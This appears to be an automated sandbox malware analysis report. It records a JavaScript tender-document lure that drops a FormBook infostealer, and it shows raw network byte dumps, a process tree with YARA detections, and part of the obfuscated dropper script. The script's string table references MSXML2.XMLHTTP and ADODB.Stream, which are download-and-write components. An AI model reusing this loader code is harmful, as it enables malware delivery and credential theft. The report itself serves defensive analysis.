f6 2a b9 eb 49 6f 56 43 24 04 5c 1b e6 70 81 37 2f 4e 4c a3 d6 83 6d 06 b0 70 cd 4e 1a 96 88 71 fa 57 3c 4d 3a 63 0e cb 85 f4 69 3a b6 70 7c 54 03 b3 ba 48 c1 ba d9 48 4c 03 d8 02
                                                                          Data Ascii: ,:8Lh"s}(2s!`-p/ft;vetOykk")/B^+InYMs5b\?3{;M'e:D\>tkMAHExU$c";3-R=O&{ivC!E]7.FPfC*IoVC$\p7/NLmpNqW<M:ci:p|THHL
                                                                          2023-01-30 12:39:17 UTC258INData Raw: fd c3 c4 32 69 3a 88 ee fa af 1c 8b f4 31 8b aa 52 2f 47 de 4f 85 2d 78 13 fb 38 11 71 23 2c e3 d4 f6 52 44 16 e7 72 21 59 06 ec 0f 4d d3 73 c5 6a 00 3c d3 c4 54 27 c0 64 28 90 d7 5d b1 58 2e 11 01 20 5a 55 aa 54 e3 8e ed 2f 66 c5 2e f2 fc 1b 37 64 ac 93 b9 78 d2 ab 46 c9 66 8a 29 ae 49 67 fe 9d c8 4c 41 19 93 86 a1 70 e5 20 08 52 6e 06 c6 65 6f 06 c5 5c 59 7c 27 7c c2 15 0a ee 9e fc 0d f0 b0 14 ec bf 85 9e fc 16 2d 86 2f f4 59 28 1c 78 c3 50 6e c6 92 5f a5 2f bd eb 56 53 0d e6 93 cb fd bd 58 aa ff 40 62 43 19 48 5a 72 25 6e 2e eb e0 37 9d 23 8a 8b 99 f4 13 d8 f6 d1 97 ad af 36 b7 ff d7 66 62 61 22 f0 93 02 02 e2 36 30 d1 f9 e0 7d df f9 f2 ef 38 3b 4f b8 55 f5 53 37 e4 e7 e0 a9 50 f6 54 1d e8 3e 65 ac 57 d1 68 24 a5 f1 24 37 83 f2 c3 5a 46 bc c3 c4 d1 b0
                                                                          Data Ascii: 2i:1R/GO-x8q#,RDr!YMsj<T'd(]X. ZUT/f.7dxFf)IgLAp Rneo\Y|'|-/Y(xPn_/VSX@bCHZr%n.7#6fba"60}8;OUS7PT>eWh$$7ZF
                                                                          2023-01-30 12:39:17 UTC266INData Raw: 80 ac e5 62 4a 15 a0 70 fe a5 69 81 c1 ea 32 09 62 7a 66 7e e6 f1 f8 ee 82 c0 f3 2a 79 ca df 3d 54 30 e4 bf c6 3a 8a a5 83 54 81 1b f1 d7 db 8c fd 3f 2a c3 44 7c 5c e8 5a b5 6f ef 94 cf 86 b4 ff ea 27 ae 22 11 36 eb 01 8d 17 71 33 48 9c 74 a2 65 a7 a0 05 6d af 21 32 e8 52 72 2a c2 1e 30 27 31 1e bc 1c 67 02 78 0f aa bd a7 0f 07 5f bd 6f 01 62 75 a0 d3 0a 46 9c 20 3d eb a6 79 9f 8d 35 74 2a c5 51 b2 e3 59 d4 49 ad dc f6 76 ae 09 a0 e9 bb a5 43 52 60 01 9c 19 04 ed c7 d4 fd 47 07 f8 6f 7b 59 59 b3 43 09 de ac 8f 28 c1 5d d8 cf e9 6b 21 fb 69 73 6a c1 b4 59 3c 01 42 fb f7 17 54 60 82 70 cc b8 60 30 2b 31 11 97 a7 f9 92 c9 02 48 5a d2 b4 cc f9 b8 90 dc 0c 90 04 77 c8 b9 b0 20 de 9d 67 97 ed 2c e2 6e 10 6d 73 b5 9a 7d a1 ff b7 53 44 fa 22 b6 9b 97 fb f4 40 6f
                                                                          Data Ascii: bJpi2bzf~*y=T0:T?*D|\Zo'"6q3Htem!2Rr*0'1gx_obuF =y5t*QYIvCR`Go{YYC(]k!isjY<BT`p`0+1HZw g,nms}SD"@o
                                                                          2023-01-30 12:39:17 UTC273INData Raw: 25 f7 a7 5c 6a 59 c7 72 25 53 60 7c 87 fb ba ad 15 0b 7e 53 1f 18 1d 43 1b 53 d1 76 79 6b c9 af f6 fd 13 69 85 8d 2a 22 d9 26 4d 36 77 00 5c 7e ee 60 8f af 17 33 34 85 ce 6f c0 2c fe 10 ec 40 f4 94 95 83 53 0f 3e fc d1 97 3a 29 0c de f7 4b 34 3e e5 a5 74 f1 dd ac b6 66 96 af ea 00 05 9b 68 4e a5 f5 8e 78 00 4b dd 23 dc 85 b9 5e 36 6c aa cc 85 1c aa c4 4d 49 6c 3f a3 63 60 85 23 87 66 f8 29 15 d9 d6 fe 72 a7 01 4d 24 ca eb dc e7 2f 3f 7b 89 8b 09 17 9c 1b 87 3a c4 15 18 6f 56 dd 68 66 63 bf 1c 96 1a 5a b5 a8 b4 e1 3b 1d 67 f8 b4 6b b5 d3 bc b0 e1 e4 5f aa 93 b3 8a ab ab 9b 32 bf 17 b8 43 02 e2 95 19 e7 5b 79 af f0 cb bc ec 21 ef cc f0 9a 30 a1 00 e7 25 3f 83 47 de 9c 30 75 91 35 4c 40 d8 09 49 e3 84 c0 42 13 4e 08 35 e4 f9 74 2e b6 7b f4 a8 06 c1 61 be 93
                                                                          Data Ascii: %\jYr%S`|~SCSvyki*"&M6w\~`34o,@S>:)K4>tfhNxK#^6lMIl?c`#f)rM$/?{:oVhfcZ;gk_2C[y!0%?G0u5L@IBN5t.{a
                                                                          2023-01-30 12:39:17 UTC281INData Raw: 38 a4 d4 35 5e 54 82 5b c3 55 8b c3 96 27 ce 35 c7 1a b1 24 ce 3c 49 f4 2a e8 82 ef 64 19 c0 2b 4b 2a ea fd 01 3f ac cb ab 60 3a ad 27 d9 cd 63 51 66 f9 2d 0a 48 13 c7 aa a1 96 c3 d9 f7 3b f9 ca 7a 3a cb a5 b1 14 ab ba e6 a7 65 30 e3 d9 46 68 a1 11 c8 9b 74 57 bb 79 dc d3 51 66 c2 98 20 92 6b 83 8f d2 51 83 b8 4a 4b 5b c1 98 96 69 f3 45 75 37 00 73 3f e8 e0 05 dc 1b b7 b2 cf b1 92 3a 51 5a bc fa 38 53 75 25 01 fb fc 20 14 11 3a 24 9c 76 a7 5e 08 f8 f0 56 42 1a 19 1d aa 8d 70 bb 3c b1 48 c5 f4 fb 09 26 12 2b 26 ef 4a 1f fc de 9c c2 a4 fe c7 ca 40 cf 8d 7e 25 49 8e 9d b0 e5 76 05 46 50 ee 2c f2 2b 95 9e a9 f3 3a 3e 33 da 5e ba 10 69 20 4e 0c 0e cf d3 cc 15 19 30 1b be 66 d8 55 8d a2 8f 90 bf 77 9d 03 60 0d 21 a1 7e e3 e7 db e4 c1 ee 80 ea cf 72 f0 b2 93 9e
                                                                          Data Ascii: 85^T[U'5$<I*d+K*?`:'cQf-H;z:e0FhtWyQf kQJK[iEu7s?:QZ8Su% :$v^VBp<H&+&J@~%IvFP,+:>3^i N0fUw`!~r
                                                                          2023-01-30 12:39:17 UTC289INData Raw: b3 25 23 78 c7 c0 97 af f9 3e 2b b7 c3 73 06 b1 86 52 9d 7b 3f 60 aa ac 38 0d 8e f3 5b 79 0e 2f 08 57 ed 61 72 bf a0 22 e9 e6 83 9e e6 18 a1 0f e8 5e 67 63 fa e7 64 85 04 89 13 0e cf b2 cb 00 14 9f 4e 1d d1 62 ad 41 02 bb 56 f6 4f 34 29 98 0e 6c 15 e3 25 d8 2e 05 1a 02 24 45 fc dc fe eb 5f 28 18 66 8c 19 44 1a 98 d4 c2 ae c7 b2 b4 30 8a 99 69 cd 72 02 58 01 f3 5e a8 9b 77 d6 09 2e a3 5b 87 8e 29 bc f8 8d df cb f7 e5 3d 76 23 9c 4c 01 43 9b e5 c1 8f cd 2b 8e d8 8a 05 39 eb 8e e9 ed 71 ef 97 a2 8c fd c3 59 ff 0d fe f0 d8 8f b8 1d 81 65 cb 62 b5 d9 e3 d1 8a 38 b9 04 c5 5c a3 4d 09 40 65 bf 8b 21 46 47 34 38 19 7a 64 8b 59 8e bb d8 ae 80 d0 5f 58 9f e5 d4 cb f9 80 07 4c 56 a7 cf 9f 7f a2 8b 18 e7 c0 20 fc 50 4a f3 98 1c 73 1d 5e a7 af 9e 1b 21 00 d2 db 69 d3
                                                                          Data Ascii: %#x>+sR{?`8[y/War"^gcdNbAVO4)l%.$E_(fD0irX^w.[)=v#LC+9qYeb8\M@e!FG48zdY_XLV PJs^!i
                                                                          Data Ascii: 6T@+-S553ZN" Bo\82mD?Z+O?p?MWv?_M-wBjVa[3=ZSnM6mxQqbZ#~4ElEALqUZvR8!x&'hn'?lo3u`Uz!w[llUQz_
                                                                          2023-01-30 12:39:17 UTC570INData Raw: 86 6e bf 09 75 5f e1 fa 44 e9 e4 45 4e f1 98 c6 f2 5e 9e 8d 88 e7 7b ba 6b fd 86 7d c9 01 12 31 83 74 da c2 4b 5e 36 91 3c 18 ce d5 4c e2 9c ac 6d 6f ce e7 64 67 11 4e 0a d7 01 b6 a8 61 53 e2 ed c4 4a 8b 38 dc e8 66 af 7f ff 8c e6 df 9a cc 5b da f2 8a e7 3c 6c 91 2b 56 8b 40 44 09 43 9f 38 0f b4 78 ff b7 2c 89 b5 0b 02 e0 f0 ec c0 e3 28 b7 5b 62 30 d6 5c d6 f1 e7 d0 be 85 91 84 eb 58 68 c5 61 f4 35 68 00 9f 5d d2 8f 43 30 2d 53 53 4b 57 2a ef 05 34 ad e0 5c 85 f0 f4 9d ac 6d 26 0a 29 55 6b b4 4a 04 5d 69 ae 93 1a 6b bc ba d3 47 0b ce e3 25 c6 63 67 89 6d c7 32 a5 5a 8d 70 0a f6 8f 09 4f 8b 22 89 10 c4 98 64 f8 35 df 10 52 e8 e0 77 c4 d1 1d 0f d4 e6 4e f3 16 71 45 bb c8 c7 e8 fd 56 6f 18 b0 ed eb 25 c2 d6 18 18 5c 09 8b bc 74 da 2b 62 36 2d c9 37 00 89 52
                                                                          Data Ascii: nu_DEN^{k}1tK^6<LmodgNaSJ8f[<l+V@DC8x,([b0\Xha5h]C0-SSKW*4\m&)UkJ]ikG%cgm2ZpO"d5RwNqEVo%\t+b6-7R
                                                                          2023-01-30 12:39:17 UTC578INData Raw: b1 30 4e eb ac 93 79 34 6f 55 bd 33 d6 c8 e7 2b 84 c6 80 99 68 ae 53 5e c9 7e 14 f1 c0 27 49 9a 9e 55 b9 0b 34 42 d4 a0 bc 81 60 fa 10 5d b9 20 35 b1 77 3c 77 c5 f0 67 34 28 fa 3d 35 ec ad bb a7 a7 c2 31 04 c1 92 4e 13 d0 2f da a3 ce da 59 1f 57 84 bb 5d 2b e5 b7 ed 44 0a f0 12 bb 9e 31 91 a2 d1 54 dc 09 18 5e c4 3b 57 a3 bc f0 04 ee 6e fe bc fa 6c 9d 28 51 9b d5 75 d1 60 eb c1 44 98 41 12 c1 86 b3 b6 40 b9 c6 0f e9 31 9a e5 b3 9d f6 27 00 ec be 77 c3 6e 26 30 39 b0 9d f2 c2 4e 6f bd 82 ef f0 c4 c5 e5 4f 3a 9b d3 d7 be b6 67 85 77 72 c5 3e 39 f6 29 99 20 42 02 dd 4e a3 92 46 46 30 44 e4 0f 9b f2 4b 6c 10 97 16 a9 5a d9 7b 6d 34 47 63 e0 b4 32 48 dd b8 c8 32 ff 6d 0b 5e 53 de 42 67 0e f8 55 dc 21 30 62 35 b4 a7 d2 71 20 90 fd 12 eb 64 5a 06 48 5f c5 9e fd
                                                                          Data Ascii: 0Ny4oU3+hS^~'IU4B`] 5w<wg4(=51N/YW]+D1T^;Wnl(Qu`DA@1'wn&09NoO:gwr>9) BNFF0DKlZ{m4Gc2H2m^SBgU!0b5q dZH_
                                                                          2023-01-30 12:39:17 UTC586INData Raw: 2c e5 8c c6 18 2c bd c2 d2 b0 57 c4 21 da 57 a9 9a 6d b5 e5 00 33 83 8c 58 d5 a6 c7 d5 3d 20 4d 8c b0 53 e6 73 cd 08 5c b1 1d b7 bc ad 85 71 8f 96 b7 8a 50 52 0c 86 52 b1 b8 77 0d b7 c5 f7 46 8a f9 32 f7 42 07 30 b0 6c cb 28 ac 0e 01 d8 4d c1 9b b3 ca 0d e4 a0 38 91 78 7b 57 4a dd 28 05 9d ff 63 be 7b e6 89 84 5b 4c bc 9c 59 19 e0 51 4e 07 5b c5 81 ec ef 11 cf 38 9d c3 48 80 10 1d fa 3a ef c7 45 9e 7f 18 7e 0c 04 a3 e7 db 96 dc 37 0d a6 0f 3a 02 ea 1f 4a ae 96 e6 ec 6b fb 13 3e 0d e3 bf bd b7 25 c4 c8 c5 81 ce 1c 97 68 8f f2 c9 4d 24 4b 31 d9 9d 7b 0c e3 ae 5c 66 5e fc 93 64 46 fb ff f7 a4 a5 a1 48 81 da 8c 8c 9d 85 b3 81 65 d2 59 48 b9 e8 6a 88 13 53 de 93 58 54 cb 5f 62 0a 2b 8b 47 27 2b 36 55 50 8f aa 49 a3 7d ab 8e a7 77 a1 9a f9 e1 5a e8 be 4d 7f f9
                                                                          Data Ascii: ,,W!Wm3X= MSs\qPRRwF2B0l(M8x{WJ(c{[LYQN[8H:E~7:Jk>%hM$K1{\f^dFHeYHjSXT_b+G'+6UPI}wZM
                                                                          2023-01-30 12:39:17 UTC594INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0b 02 00 02 01 41 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 49 53 79 73 74 65 6d 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 05 01 00 00 00 1f 53 79 73 74 65 6d 2e 43 6f 64 65 44 6f 6d 2e 4d 65 6d 62 65 72 41 74 74 72 69 62 75
                                                                          Data Ascii: AISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089System.CodeDom.MemberAttribu
                                                                          2023-01-30 12:39:17 UTC602INData Raw: 80 00 00 01 80 00 00 01 80 00 00 07 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ce ce ce 65 d6 d6 d6 ff cf cf cf ff ce ce ce ff cc cc cc ff c9 c9 c9 ff c8 c8 c8 ff c8 c8 c8 ff ca ca ca ff cc cc cc ff ce ce ce ff d0 d0 d0 ff d1 d1 d1 ff d1 d1 d1 ff c6 c6 c6 a5 d2 d2 d2 25 cf cf cf 7f ed ed ed ff e2 e2 e2 ff e3 e3 e3 ff e4 e4 e4 ff e4 e4 e4 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e4 e4 e4 ff e4 e4 e4 ff e3 e3 e3 ff e2 e2 e2 ff e2 e2 e2 ff d1 d1 d1 ff cc cc cc 7f d0 d0 d0 7f ee ee ee ff e4 e4 e4 ff e6 e6 e6 ff e7 e7 e7 ff e7 e7 e7 ff e8 e8 e8 ff e8 e8 e8 ff e8 e8 e8 ff e7 e7 e7 ff e7 e7 e7 ff e6 e6 e6 ff e4 e4 e4 ff e3 e3 e3 ff d1 d1 d1 ff cd cd cd 7f d0 cf d0 7f ef ef ef ff e7 e7 e7
                                                                          Data Ascii: ( @e%



                                                                          Target ID:0
                                                                          Start time:13:38:29
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0900664 MOHS Tender..js"
                                                                          Imagebase:0x7ff6bcd40000
                                                                          File size:163840 bytes
                                                                          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:1
                                                                          Start time:13:39:18
                                                                          Start date:30/01/2023
                                                                          Path:C:\Users\user\AppData\Local\Temp\winner.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\winner.exe"
                                                                          Imagebase:0x260000
                                                                          File size:619008 bytes
                                                                          MD5 hash:A9C03263C6DD4A1B672955A5ECADC1FF
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 34%, ReversingLabs
                                                                          Reputation:low

                                                                          Target ID:2
                                                                          Start time:13:39:20
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                          Imagebase:0x820000
                                                                          File size:107624 bytes
                                                                          MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          Reputation:moderate

                                                                          Target ID:3
                                                                          Start time:13:39:22
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff69bc80000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:6
                                                                          Start time:13:39:34
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Imagebase:0x1290000
                                                                          File size:29184 bytes
                                                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          Reputation:high

                                                                          Call Graph

                                                                          [Call graph figure. Legend: Executed / Not Executed. Nodes include the script functions _0x33f1, _0x38e1, _0x3dc1, _0x4495, _0x31b8 and _0x10bd.]

                                                                          Script:

                                                                          Code
                                                                          function _0x33f1() {
                                                                          • _0x33f1() ➔ jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u
                                                                          var _0x237372 = [ 'jjEhYu', 'WOGynK1UEIHeaCoZd8ogza', '3rnQ', 'tCk1WPiAW7/dOb3dQG', 'MSXML2.XMLHTTP', 'ASkCW6DM', 'WQpdJaNdUSkw', '3080NCsyfc', 'E0RdL8o3lfldQcTd', 'cz*B', 'W5ZdI13cMmk4B2fiW4xdTW', 'bmo7FSkWWRb9cuhdOSk3', 'pAZheY', 'length', 'h0H+WOxcJbWDWRJcSmkoWOlcR0y', '35751wCkNjf', '&DC)', '198188fskAji', 'F8kCWOxdSH1PW4e', 'whGqWOWIpCkIW71DWQruaW', 'EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb', 'vsWRWQK', 'WR7cMfrp', 'W5BcVetcV8osW7zdW68', 'hSoxWORdHNVdN8klW7G', 'WOZcLbldI3rPW5jqtSo2', 'WQNcGrH+WQq', '25828720vLEpnk', 'pmkFW50dCG0jW4LoWPS', 'Send', '12618EMHTyj', 'mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa', 'Close', 'W4PEFry', 'zKbRWOpcIgODuuhdMCkwDG', '252cwJMcn', 'W5RcOGxcPSoyWO3dSqG', 'W57dHuVcIa8+W5bgzmoddvu', 'WOJdI8o5WOtcJCk0', 'W7mUrSkZ', 'W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm', '172CBHuQO', 'WPZdJwWYW5RcT3RdGGGnlgBcSq', 'ADODB.Stream', 'W6ZcGIqLqNC', 'a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF', '51926vemoDJ', 'gM3dJZ48WOy8WOFdMsZdQCkaW7S', 'rmkoj8oa', 'Open', 'WPNdVhRcR8kzWQK', '3o8g', 'Type', 'indexOf', 'W6fsbSk5WOVcUYv+tsCGaZC', 'pfOEWQ0', 'W6ldLeaRW7enWOncnxNdHCkQ', 'gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt', 'dmoHW7v3BKGbW6/cMSoQpSk/', 'CreateObject', 'W6rYdtFcS8oa', 'iCoWWQi', 'W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW', 'WR7dMNbNmJVcICkHa8oQW6RcQSo0', 'W4eBm1u' ];
                                                                            _0x33f1 =
                                                                              function () {
                                                                              • _0x33f1() ➔ jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u
                                                                              • _0x33f1() ➔ WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj